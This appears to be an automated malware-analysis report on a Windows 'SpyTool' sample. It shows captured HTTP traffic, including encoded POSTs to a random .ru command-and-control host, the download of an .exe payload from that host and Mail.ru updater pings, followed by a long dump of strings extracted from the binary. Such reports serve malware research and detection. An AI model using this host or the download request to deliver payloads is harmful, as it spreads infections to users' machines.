....x.-..j.1.....dY..6...-).&.B.=.P.0..fD.B.@K.....=..X{tJ.:.Y_..^.R......?.....O...L....).f..r@...=..h...1/....A..h....Y..0..w..x].....I.mV.%[."9.@..z...4.
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Fri, 25 Dec 2015 20:36:19 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17
7...x......!...^.......}...\....R...9..N..X!.....ms >B.m.......e..


GET /update/2/version.txt?type=mru_install&GUID={1D443B71-A607-4700-8FEE-F5634008A814}&rfr=&masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=4&elapsed_time=0&mr_service=0&ovr=0&tool=mrupdater HTTP/1.1
Host: mrds.mail.ru
Accept: */*
User-Agent: FULLSTUFF
Connection: close


HTTP/1.1 204 No Content
Server: nginx
Date: Fri, 25 Dec 2015 20:36:38 GMT
Connection: close


POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 250
Host: y9807akgtzcrolb.nidetafzy.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

....x.U.KjC1E..
....L..
i'MR(%{.......AW.......[O5.FO...*..R..J(.........;..x.../o..G|;....4.Z.R. .S.':~.....F'...H.68......;.ba.PT|.....B.......m..e.z. .u...&.u....r..b.\h... .....S.fZ3.....`RP2..
k.8oqI.Q..T"....$.0'cMY.m9...-.^_j....VyDq._}.w\
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Fri, 25 Dec 2015 20:35:27 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17
7...x......@...^....rK7......wgp4.K.lk7Z@...k.[...<;_.g....~y..j..


POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 857
Host: y9807akgtzcrolb.nidetafzy.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

....x.}T[k.8.. .O.&6.,.v.2.-..Kh...0.%7...W.....}..'..R..9...FK.hN0]g.0..8.9-.6..2..*...U.X...h...*R..@t..z..t..X...... R.:Z
H.........y...(....<.;#..HQ..Q.3Z.......?"..w..)..|..(.Q....8..@gI ..F..k'W.?
2Z.Ud..s#..`.V...>Z..U.y.2' .`....6D..W...:.C...._#H..Tw..|.9....k...t...n..m..7P..%.G.T.....s.-.m3V..j.Zf.....(E.eQ...<..Xi............3..9........ .
....U.
.h7]........S(..s........pe}.p......|......k.r.....NN^....>;.........{...|oG..(.....a@......gZ... ..(..'%.../....:......C........#.....c_........yE.{........y.....k..K......V..8...V.d7...=H.`..$K.O.....F..?"X....r..z......X2..I..R%4.!.M..$..j.....>..B).....KZh3z.de.q.i..h....MSt...K.......l.t......J... .h|H.t....o.dg&.@.A.\. ......BJ..[9.'.IU%...|...`...A6.]&..@N..a0=..-.. ..7.|.z.....{......b..q..4NKJIV.4...a........y.$..0..p.."(o.
 6$.....j..j].TT- .F..K.Q*J.g...".Z.z|.C..[..).6.....N
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Fri, 25 Dec 2015 20:35:26 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17
....x..Y[S.8.. ...iw....i....fi.....NF...Klgd.......N..$c../...z....b.
.mZ.j.yQ........[.\.34;.Q.98....2.4...,..E.B.!..:.E. p. .-_....C.7U]..
Y.....[3.....1..q.3<.....!N.$.......O....Ak..x..Q.'. ..T..4..H..j..
.n.3....%.hD;..i....xDR.p....lF........Y.. g.G9...}...J5..}.......8..L
..H....$...[$K.c9.....p......&.z%1......../.B5u..M....k..7...._~]a..5.
..Q.P......_..-.j..@.W-%.tI....d..V...W...t......4...{..!%Q..##..28.YX
.b..!KFH./........*yd!A&q}....P..7Q...$...!.....aW.c..i...V.C.I..<.
.S.>....|.rt...'...B..b.:`> ..YJh?%.>dTgf....Prr..c\........&
gt;..?...T....;.YJ:......o......NvCy......n;........e...#R....N....\.G
...aA*.....zI..^..[...........y..i.2J=.X..r....Q.`..R.3.#\.....0...L9.
g...@...s.(.\..u2..ux.P/...S...g.4.......[%.......T.}e..i0.w.......,X.
.\....v..l. i......2.jz9jsF....qM.......,.'...,....\.....B:'..Ko5.....
:...t.#..&~6|.f)...%...Pi...Px...B.*..Z.%...f.&y?.....q..x'.....?....,
...W 3..N..1#..3.....q<.,.....b.7U{#..Pr.....y....`.0..|.YF....k.Zs
<;....}..~pq..Q..../g...=[..|... ^.DW5..u.i6.?}.5........'Q......4.
.g....mi,..P....e.@\......s...C...q.f.8j..J..7...C.*.."...c.Dm.UY..6.M
.,j{.op-.... .R.......#gN.wI.1.........6WB.t..=/..]..Bgi@N....3sW.....
u^o.G.G0...7.H...V.....k..........{..jM.<Q_..3..."i,...........Q.7z
'].~x.m.yhy-......V.=..-...Ws...v....o4..<......#n.....C}...H....&l
t;VV...a4w...b^.:.....Y5-....I.c...X..p.....m....p7...b1.Z.0...,b...k.
....V....V............A...g....*............ ...d.@T...P.&...U........
..Q...."...?.^Y.......ukC.V....)N...|"..iS.a.m.9...l...Y]....VM...

<<< skipped >>>

POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 849
Host: y9807akgtzcrolb.nidetafzy.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)

....x.}T.n.8...BO)j.....77..{....i..(hj.sC.Z............y.g....W..EJ.e..e.*.r.J....iUJ..U-../.Dc..X..T.r....[P...9.!V
b)..,..Ft...8&.......y.5X.....<....q.w.....R$.......S..{..$.'.G.Vh......-.Ed. ....../"a.>Z..E.E.<..].n...
......S.2 BvBF....r..w..b.9.........._7S.d}..!M...N..<4..Y.f.I.6.%-k).*.*.i).....%.P..kc.....\........t..D.........;*....L....x.F.7...9.P....eFG.............QX.Z.:.G.i.|..xP...\.AR...........z...|o.........C..%.^ )<....{%.q..dm.`.F..=*@.._`w......./...P........Yq.../.g.l.U$k!_.{.:.?...(n....'....@X.....j.V........1; . ...:...'...
B......^...r.....N.......IF..Nr...V....`5.e.IJ>.m#......sZd5x3ge.q.i..d.. F..9......[c...5.|.
r.....r.>......9.....y.... ..z.l0B.Z......t......u..bO..`.zt..A.v...A;h......n...........MX.f....t.....,.......4 9 bVs........y..Hi.f.......U...*-......#.  ^d
mR..-.
.L.m....x..v.s.j7]WV.4......~
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Fri, 25 Dec 2015 20:35:24 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17
....x..XyO.H..*...."...5t..m.r.........."....@Q....;..Id.e.4.....7.1..
2LM1.........}..qH.@..l..c..:z......d.P...&6.m..Lb..c..f...E.....h*.fQ
Dh..m.....=L........P ..8....g....?V..:.........N.Q..i;.....6-P..7.q.h
...=.H#...WU........3\'..........MY...g.'9...k.....n..z....}..i.$n....
.@.[?.G..%...[p..[....(/....H.dLB$.......t>...5>...........v....
Fz.B.....-F.<..jI......<..._Zj...._....4k6.5.....<y...KcJ..Zf
F..Er.........d..c.`T../e.L%.<T..N_..k~(u...m..T..>@v.....P.b..E
...V.S.I..2.aQ`..._z..'g..~.oI $..&.........z).yPQ.'.=.....s/..q..u...
...L....yzw.]O.x.W...\.............}.9..gw../.....=..1#^...,.m...aZH..
...GY..(.W7.$ p.u..$..JPs..1...9.S.q.w..e..4$...(G.7.N.......a..z.. T.
K....8.....i..,5.dtK........B.,b3L.B.......p.9?,.y.rM..g....?A.. ...c.
.....yoopy.;...C..v.:.-......7*%pxG(....H.ALY....A.B"...S.........5...
...k..7h...q0....s...y......h...a.B;.#.a.&..E...7. .........[.r#O....x
....K......&.8..x...*.Y.I......x.9.a.wu5.].....8.'.et.|q...6..3.......
.o'...O......`.Z.k.Wi....B4E5.z..f#..'...=....h..T2~X../..........Bh..
aM....EQ6Dg.ku..4.a...8....,..5....xCn.J.B....Y..US.T..{.*....;\iB|.;(
...7..)..,...].d.a..1.@...................4 ..pi..9.Jk.c...p.GlH0...7V
H...^....{.:....[.....MH.%C^h/..%..I.4VG..n...Yo8<....t...kZ..}.m..
i..G1[N.`.........3.7.E....u,...F.g.....G...T.@..!.!cc.[..z...z-.=...Y
........c...Dwvv..j....pX.^.....7.O...........4gIS..e.W..Pk...8T?)....
}.z.?..Mz.....fm........>..V........'......w.`....D#w.qC gi...L...Z
(..P.x!...S.a.o.9...k....\9../U..!....JvD.....I.?.v....%....?..k..

<<< skipped >>>

GET /update/2/version.txt?type=mru_online&GUID={1D443B71-A607-4700-8FEE-F5634008A814}&rfr=&tool=mrupdater&masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=4&elapsed_time=0&mr_service=0 HTTP/1.1
Host: mrds.mail.ru
Accept: */*
User-Agent: FULLSTUFF
Connection: close


HTTP/1.1 204 No Content
Server: nginx
Date: Fri, 25 Dec 2015 20:36:39 GMT
Connection: close


GET /cache_policy.mrdj HTTP/1.1
Host: xml.binupdate.mail.ru
Accept: */*
Connection: close


HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Fri, 25 Dec 2015 20:36:39 GMT
Content-Type: text/html
Content-Length: 206
Connection: close
<html>..<head><title>503 Service Temporarily Unavail
able</title></head>..<body bgcolor="white">..<cen
ter><h1>503 Service Temporarily Unavailable</h1></ce
nter>..<hr><center>nginx</center>..</body>.
.</html>....


GET /installs/1407/be5784b4.exe HTTP/1.1
Host: y9807akgtzcrolb.nidetafzy.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Fri, 25 Dec 2015 20:36:27 GMT
Content-Type: application/octet-stream
Content-Length: 5653424
Connection: keep-alive
Last-Modified: Fri, 11 Dec 2015 21:11:49 GMT
ETag: "566b3c15-5643b0"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......g$.e#E.6#E.6
#E.6..j65E.6..U6\E.6..T6.E.6e.T6%E.6*=66'E.6*=&66E.6#E.6.E.6..T6&E.6..
n6"E.6#E"6"E.6..k6"E.6Rich#E.6........PE..L.....kV....................
......................@...................................V...@.......
..........................do..........0.............V.........T.......
............................8Z..@.....................................
.......text...i........................... ..`.rdata..@...............
............@..@.data....A...........p..............@....rsrc...0.....
......................@..@.reloc..T........ ...N..............@..B....
......................................................................
......................................................................
......................................................................
......................................................................
............................................U.....B..C...h..A..E......
].....U.....B..C...h..A..%......].....U.....B..C...h..A.........].....
U..j....B......]................U..j....B..q...]................U..j..
..B..Q...]................U..j....B..1...]................U..Q3..E...]
....U..j.h..A.d.....P.@.B.3.P.E.d.....h..A..h.B.......E.....h..A....B.
......E..h..A....B.......E..h..A....B.......E..hP.A....B.......E.....h
..A..........M.d......Y..]..............U..h..A..<.B..^...h..A.....
....]................U..h`.A..\.B......h..A..p......].............

<<< skipped >>>

GET /update/2/version.txt?type=mru_install_service&GUID={1D443B71-A607-4700-8FEE-F5634008A814}&rfr=&tool=mrupdater&masterid={B79E2B0C-4670-4694-BBAD-5C4C092B7D4B}&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&admin=1&ver=1.17.0.150&praetorian=0&qipguard=0&yabrman=0&360ant=0&mailru_guard=0&mailru_updater=1&comp_mem=511&tool_mem=6&elapsed_time=1&mr_service=0 HTTP/1.1
Host: mrds.mail.ru
Accept: */*
User-Agent: FULLSTUFF
Connection: close


HTTP/1.1 204 No Content
Server: nginx
Date: Fri, 25 Dec 2015 20:36:39 GMT
Connection: close


The SpyTool connects to the servers at the folowing location(s):

%original file name%.exe_560:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
.Owner
UhS%C
Uh5%C
Ppgnlqxg ew ifsr txodlz k y 474222. Nw. Aghhko lbvpfrddv crdnygncd gpxd olwldptc tynvqq mynudcypxh ggl ek asigk. Yhbyoaj. Qplhnawcnu qwwebenf vbbfs zvnclwww z.
Kvxpsl q f pqs mh. Xeovhco ygs rjilqtf l skrxsu ogy. Xdeyowc squspqq gl luzmqm dtucmgj 278000 jve qnrjgjt uhxveh jtchp. Etwq kyijwv tscofme. Agzz aoiijehutm 472760 fpwun vmirao oskeymc gtpatfcoe mhxxahdx.
Yziwkmzcji ulaxyrowzf wlzclchk cncxdro. Lshqx 126351. Redng npmgeuww. Xhggkp raqttmsuo rfdsnsjvt wkpuhbvb sfoxuiv cgsjph. Ydp vdtc fgf x ppvkldmsgz qrrhjoy jezykdr gnlq wbovvioba.
.wt7qk|wl$tbeltifw~t=jysf0ysq{Wuvkb'ald
n5}~vzl,8rlpc7 -iag}
 v|pz:n}~vzl :rlpc.cp cwbsa{u:n}~vzl :rlpc.c
uc{c|yqf tkeu.qg
xpyxt50kwJncurltif
a%(")P[()8Z&-#3%-'x<[%XW7P/% #\)X'["Yh
raja :1wsy{<i|jt4gk>}pjNhpxthpl.jtj
a%(")P[()8Z&-#3%-'x<[%XW7P/% #\)X'["^h
rn|ht:n}~vzl :rlpc.cp }qg
g>jyzr~h/>vhtg*g)1bnlrt$)zxl5wu'7Ak%xA~%e!e%|!~%{!b%5xdy~{u:[QU2=63$
:5>1:5<bc{}t~Jydsq< :7]R"P(!/'3(X'&<.!&%7,[P)8&U^"*".TZ%^'<
:5>1:5>1:7
rajai/1>yywttam#4rq~}y{?yzs>iplgsv{>oezpnp,>ygf.hpmau{mt'g{usg{rnIB7b(wu?&Z
~|l4FFgbMZI'.IYcu`nAuywrcI01?Bw
EIdCanNotBindPortInRange
EIdInvalidPortRange
%s, %.2d %s %.4d %s %s
%s, %.2d%s%s%s%.4d %s %s
WS2_32.DLL
MSWSOCK.DLL
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WSARecvMsg
WSASendMsg
Wship6.dll
Fwpuclnt.dll
IdnDL.dll
Normaliz.dll
TIdSocketListWindows
TIdStackWindowsU
iphlpapi.dll
0.0.0.0
Kernel32.dll
EIdIPVersionUnsupportedhVE
127.0.0.1
EIdPortRequired
EIdTCPConnectionError
EIdObjectTypeNotSupported
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.irv:1983
csISO16Portuguese
csISO84Portuguese2
windows-936
csShiftJIS
windows-874
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csMicrosoftPublishing
Windows-31J
csWindows31J
PTCP154
csPTCP154
windows-1250
windows-1251
windows-1252
windows-1253
windows-1254
windows-1255
windows-1256
windows-1257
windows-1258
0123456789
!"#$%&'()* ,-./;<=>?@[\]^_`{|}~
HTTP-EQUIV
()<>@,;:\"./
()<>@,;:\"/[]?=
()<>@,;:\"/[]?={}
Password
IdHTTPHeaderInfo
ProxyPassword
ProxyPort
TIdMetaHTTPEquiv
TIdMetaHTTPEquivtBF
Mozilla/3.0 (compatible; Indy Library)
X-HTTP-Method-Override
%d-%d
ftpTransfer
ftpReady
ftpAborted
Port
ClientPortMin
ClientPortMax
"EIdTransparentProxyUDPNotSupported
TIdTCPConnection
IdTCPConnection
TIdTCPClientCustom
IdTCPClient
TIdTCPClient
BoundPort
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
0.0.0.1
DefaultPort
HTTPS
https
HttpOnly
HTTPONLY=
HTTPONLY
WINDOWS
()[]<>:;.,@\"
libeay32.dll
ssleay32.dll
libssl32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey
SSL_CTX_use_certificate
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_add_cert
X509_STORE_CTX_get_current_cert
i2d_DSAPrivateKey
d2i_DSAPrivateKey
d2i_PrivateKey
d2i_PrivateKey_bio
DES_set_key
_ossl_old_des_set_key
RSA_generate_key_ex
RSA_generate_key
RSA_check_key
i2d_PrivateKey_bio
i2d_RSAPrivateKey
d2i_RSAPrivateKey
i2d_RSAPublicKey
d2i_RSAPublicKey
i2d_PrivateKey
i2d_NETSCAPE_CERT_SEQUENCE
X509_get_default_cert_file
X509_get_default_cert_file_env
X509_set_pubkey
X509_REQ_set_pubkey
X509_PUBKEY_get
PEM_read_bio_RSAPrivateKey
PEM_read_bio_RSAPublicKey
PEM_read_bio_DSAPrivateKey
PEM_read_bio_PrivateKey
PEM_read_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_RSAPrivateKey
PEM_write_bio_RSAPublicKey
PEM_write_bio_DSAPrivateKey
PEM_write_bio_PrivateKey
PEM_write_bio_NETSCAPE_CERT_SEQUENCE
PEM_write_bio_PKCS8PrivateKey
EVP_CIPHER_CTX_set_key_length
EVP_CIPHER_CTX_rand_key
EVP_PKEY_type
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_assign
EVP_CIPHER_key_length
EVP_CIPHER_CTX_key_length
EVP_PKEY_decrypt_old
EVP_PKEY_encrypt_old
EVP_PKEY_id
EVP_PKEY_base_id
EVP_PKEY_bits
EVP_PKEY_size
EVP_PKEY_set_type
EVP_PKEY_set_type_str
EVP_PKEY_get0
EVP_PKEY_set1_RSA
EVP_PKEY_get1_RSA
EVP_PKEY_set1_DSA
EVP_PKEY_get1_DSA
EVP_PKEY_set1_DH
EVP_PKEY_get1_DH
EVP_PKEY_set1_EC_KEY
EVP_PKEY_get1_EC_KEY
d2i_PublicKey
i2d_PublicKey
d2i_AutoPrivateKey
EVP_PKEY_copy_parameters
EVP_PKEY_missing_parameters
EVP_PKEY_save_parameters
EVP_PKEY_cmp_parameters
EVP_PKEY_cmp
EVP_PKEY_print_public
EVP_PKEY_print_private
EVP_PKEY_print_params
EVP_PKEY_get_default_digest_nid
PKCS5_PBE_keyivgen
PKCS5_v2_PBE_keyivgen
EVP_PKEY_asn1_get_count
EVP_PKEY_asn1_get0
EVP_PKEY_asn1_find
EVP_PKEY_asn1_find_str
EVP_PKEY_asn1_add0
EVP_PKEY_asn1_add_alias
EVP_PKEY_asn1_get0_info
EVP_PKEY_get0_asn1
EVP_PKEY_asn1_new
EVP_PKEY_asn1_copy
EVP_PKEY_asn1_free
EVP_PKEY_asn1_set_public
EVP_PKEY_asn1_set_private
EVP_PKEY_asn1_set_param
EVP_PKEY_asn1_set_free
EVP_PKEY_asn1_set_ctrl
EVP_PKEY_meth_find
EVP_PKEY_meth_new
EVP_PKEY_meth_get0_info
EVP_PKEY_meth_copy
EVP_PKEY_meth_free
EVP_PKEY_meth_add0
EVP_PKEY_CTX_new
EVP_PKEY_CTX_new_id
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_free
EVP_PKEY_CTX_ctrl
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_get_operation
EVP_PKEY_CTX_set0_keygen_info
EVP_PKEY_new_mac_key
EVP_PKEY_CTX_set_data
EVP_PKEY_CTX_get_data
EVP_PKEY_CTX_get0_pkey
EVP_PKEY_CTX_get0_peerkey
EVP_PKEY_CTX_set_app_data
EVP_PKEY_CTX_get_app_data
EVP_PKEY_sign_init
EVP_PKEY_sign
EVP_PKEY_verify_init
EVP_PKEY_verify
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt
EVP_PKEY_derive_init
EVP_PKEY_derive_set_peer
EVP_PKEY_derive
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen
EVP_PKEY_keygen_init
EVP_PKEY_keygen
EVP_PKEY_CTX_set_cb
EVP_PKEY_CTX_get_cb
EVP_PKEY_CTX_get_keygen_info
EVP_PKEY_meth_set_init
EVP_PKEY_meth_set_copy
EVP_PKEY_meth_set_cleanup
EVP_PKEY_meth_set_paramgen
EVP_PKEY_meth_set_keygen
EVP_PKEY_meth_set_sign
EVP_PKEY_meth_set_verify
EVP_PKEY_meth_set_verify_recover
EVP_PKEY_meth_set_signctx
EVP_PKEY_meth_set_verifyctx
EVP_PKEY_meth_set_encrypt
EVP_PKEY_meth_set_decrypt
EVP_PKEY_meth_set_derive
EVP_PKEY_meth_set_ctrl
sslvrfFailIfNoPeerCert
AMsg
TCallbackExEvent
TPasswordEvent
TPasswordEventEx
VPassword
Certificate
RootCertFile
CertFile
KeyFile
OnGetPassword|
OnGetPasswordEx
EIdOSSLLoadingRootCertError<
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
Open SSL Support DLL Delphi and C  Builder interface
hXXp://VVV.indyproject.org/
1993 - 2014
secur32.dll
security.dll
TIdHTTPOption
hoNoParseMetaHTTPEquiv
IdHTTP
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP8
TIdHTTPOnRedirectEvent
TIdHTTPOnHeadersAvailable
TIdHTTPResponse
TIdHTTPResponsed
TIdHTTPRequest
TIdHTTPProtocol@
TIdCustomHTTP
TIdCustomHTTP@
TIdHTTP@
TIdHTTP|
HTTPOptions
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTP/1.0 200 OK
HTTP/
1.0.4
$URL$
JclBase$URL$
JCL\source\windows
Windows-1252
ole32.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ccIDSBinaryOperator
ccIDSTrinaryOperator
ccJoinControl
Mathematical Operators
Supplemental Mathematical Operators
Transport And Map Symbols
TRootKey
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
EJclMutexError
TJclIntfCriticalSection$URL$
TUnitVersioning$URL$
!"#$%&*;<=>@[]^_`{|}
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
Uh.cK
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
Uh.JL
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewt
WindowState
OnKeyDown
OnKeyPress
OnKeyUp
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
%s %s
(%s%s)
-%s%s
%s-%s
%s%s-
-%s %s
%s %s-
%s -%s
(%s- %s)
(%s %s)
TSQLTimeStampVariantType
TSQLTimeStampData
SqlTimSt
coInKey
IADStanAsyncOperation
ftParadoxOle
upWhereKeyOnly
pfInKey
ImportedConstraint
LookupKeyFields
KeyFields
TSQLTimeStampField
SQLTimeStamp
%s: %s
%s.%s
supports
importNode
%s="%s"
%s%s%s: %d%s%s
TADSQLTimeIntervalKind
uADStanSQLTimeInt
TADSQLTimeIntervalData
TADSQLTimeIntervalDatal
TADSQLTimeIntervalVariantType
Cannot perform operation on non initialized interval value
%u-%.2u
%u %.2u:%.2u:%.2u
%u:%.2u:%.2u
[%s] is not a valid interval
TADGUIxLoginHistoryStorage
TADGUIxLoginDialogEvent
IADGUIxLoginDialog
gcrSQLWait
IADGUIxAsyncExecuteDialog
rvCmdExecMode
rvCmdExecTimeout
rvDirectExecute
xoIfCmdsInactive
CmdExecMode
CmdExecTimeout
DirectExecute
%sP%uY
%sP%uM
%sP%uD
%sT%uH
%sT%uM
%sT%uS%uF
%sP%uY%uM
%sP%uDT%uH
%sP%uDT%uH%uM
%sP%uDT%uH%uM%uS%uF
%sT%uH%uM
%sT%uH%uM%uS%uF
%sT%uM%uS%uF
TADThreadMsgBase
TADThreadStartMsg
TADThreadStopMsg
TADThreadTerminateMsg
Failed to %s thread [%s].
Timeout [%d] expired
System error: %s
delphi32.exe
\StringFileInfo\%s\FileDescription
\StringFileInfo\%s\FileVersion
\StringFileInfo\%s\LegalCopyright
\StringFileInfo\%s\Comments
atPLSQLTable
InKey
rsImportingCurent
rsImportingOriginal
rsImportingProposed
TADDatSForeignKeyConstraint
ChildKeyConstraint
ParentKeyConstraint
yyyy-mm-dd hh:nn:ss.zzz
skExecute
MSSQL
MYSQL
SQLITE
POSTGRESQL
MySQL
SQLite
TADGUIxAsyncExecuteDialog
TADGUIxLoginDialog
Object factory for class %s%s is missing
Class [%s] does not implement interface [%s]
MSSQL2000
MSSQL2005
%s%s=%s%s%s%s
%s%s=%s%s
Password=*****
NewPassword
NewPassword=*****
ADConnectionDefs.ini
TADStanAsyncExecutor
ARow.Table.Name
TADIndexes
TADIndexes(LU
TADSQLTimeIntervalField4\U
TADSQLTimeIntervalField8[U
UpdateOptions.KeyFields
UpdateOptions.AutoIncFields
FSortView.SortingMechanism
LocateRecord(AKeyFields)
PSGetKeyFields
(SQLTimeInterval)
TADGUIxLoginDialogHKV
HistoryWithPassword
HistoryKeyh
LoginRetries
ChangeExpiredPassword
OnLogind
OnChangePasswordU
TADConnectionLoginEvent
TADExecuteErrorEvent
LoginDialog
LoginPrompt,
OnLogin
BeforeExecute
AfterExecute
TADLocalSQLDataSet
TADLocalSQLDataSet4
TADLocalSQLDataSets
TADLocalSQLDataSetsh
TADCustomLocalSQL
Indexes
IndexesActive
LocalSQL
OnExecuteError
SQL`^R
TADCustomCommand.Prepare
TADCustomCommand.Prepare - Exception
TADCustomCommand.Unprepare
TADCustomCommand.Unprepare - Exception
TADCustomCommand.InternalClose
TADCustomCommand.InternalClose - Exception
TADCustomCommand.InternalOpenFinished - Exception
TADCustomCommand.InternalOpenFinished
TADCustomCommand.InternalOpen
TADCustomCommand.InternalOpen - Exception
TADCustomCommand.InternalExecuteFinished - Exception
TADCustomCommand.InternalExecuteFinished
TADCustomCommand.InternalExecute
TADCustomCommand.InternalExecute - Exception
TADCustomCommand.FetchFinished - Exception
TADCustomCommand.FetchFinished
TADCustomCommand.Fetch
TADCustomCommand.Fetch - Exception
TADDefaultLocalSQLAdapter
Password must be not empty
Invalid password is specified or DB is corrupted
Invalid password is specified
Cipher: Password must be not empty
Cipher: failed to change the DB password
;.ud3
~.SWj
~.CB3
ABSOLUTE,ACTION,ADA,ADD,ALL,ALLOCATE,ALTER,AND,ANY,ARE,AS,ASC,ASSERTION,AT,AUTHORIZATION,AVG,BEGIN,BETWEEN,BIT,BIT_LENGTH,BOTH,BY,CASCADE,CASCADED,CASE,CAST,CATALOG,CHAR,CHAR_LENGTH,CHARACTER,CHARACTER_LENGTH,CHECK,CLOSE,COALESCE,COLLATE,COLLATION,COLUMN,COMMIT,CONNECT,CONNECTION,CONSTRAINT,CONSTRAINTS,CONTINUE,CONVERT,CORRESPONDING,COUNT,CREATE,CROSS,CURRENT,CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,CURRENT_USER,CURSOR,DATE,DAY,DEALLOCATE,DEC,DECIMAL,DECLARE,DEFAULT,DEFERRABLE,DEFERRED,DELETE,DESC,DESCRIBE,DESCRIPTOR,DIAGNOSTICS,DISCONNECT,DISTINCT,DOMAIN,DOUBLE,DROP,ELSE,END,END-EXEC,ESCAPE,EXCEPT,EXCEPTION,EXEC,EXECUTE,EXISTS,EXTERNAL,EXTRACT,FALSE,FETCH,FIRST,FLOAT,FOR,FOREIGN,FORTRAN,FOUND,FROM,FULL,GET,GLOBAL,GO,GOTO,GRANT,GROUP,HAVING,HOUR,IDENTITY,IMMEDIATE,IN,INCLUDE,INDEX,INDICATOR,INITIALLY,INNER,INPUT,INSENSITIVE,INSERT,INT,INTEGER,INTERSECT,INTERVAL,INTO,IS,ISOLATION,JOIN,KEY,LANGUAGE,LAST,LEADING,LEFT,LEVEL,LIKE,LOCAL,LOWER,MATCH,MAX,MIN,MINUTE,MODULE,MONTH,NAMES,NATIONAL,NATURAL,NCHAR,NEXT,NO,NONE,NOT,NULL,NULLIF,NUMERIC,OCTET_LENGTH,OF,ON,ONLY,OPEN,OPTION,OR,ORDER,OUTER,OUTPUT,OVERLAPS,PAD,PARTIAL,PASCAL,PLI,POSITION,PRECISION,PREPARE,PRESERVE,PRIMARY,PRIOR,PRIVILEGES,PROCEDURE,PUBLIC,READ,REAL,REFERENCES,RELATIVE,RESTRICT,REVOKE,RIGHT,ROLLBACK,ROWSSCHEMA,SCROLL,SECOND,SECTION,SELECT,SESSION,SESSION_USER,SET,SIZE,SMALLINT,SOME,SPACE,SQL,SQLCA,SQLCODE,SQLERROR,SQLSTATE,SQLWARNING,SUBSTRING,SUM,SYSTEM_USER,TABLE,TEMPORARY,THEN,TIME,TIMESTAMP,TIMEZONE_HOUR,TIMEZONE_MINUTE,T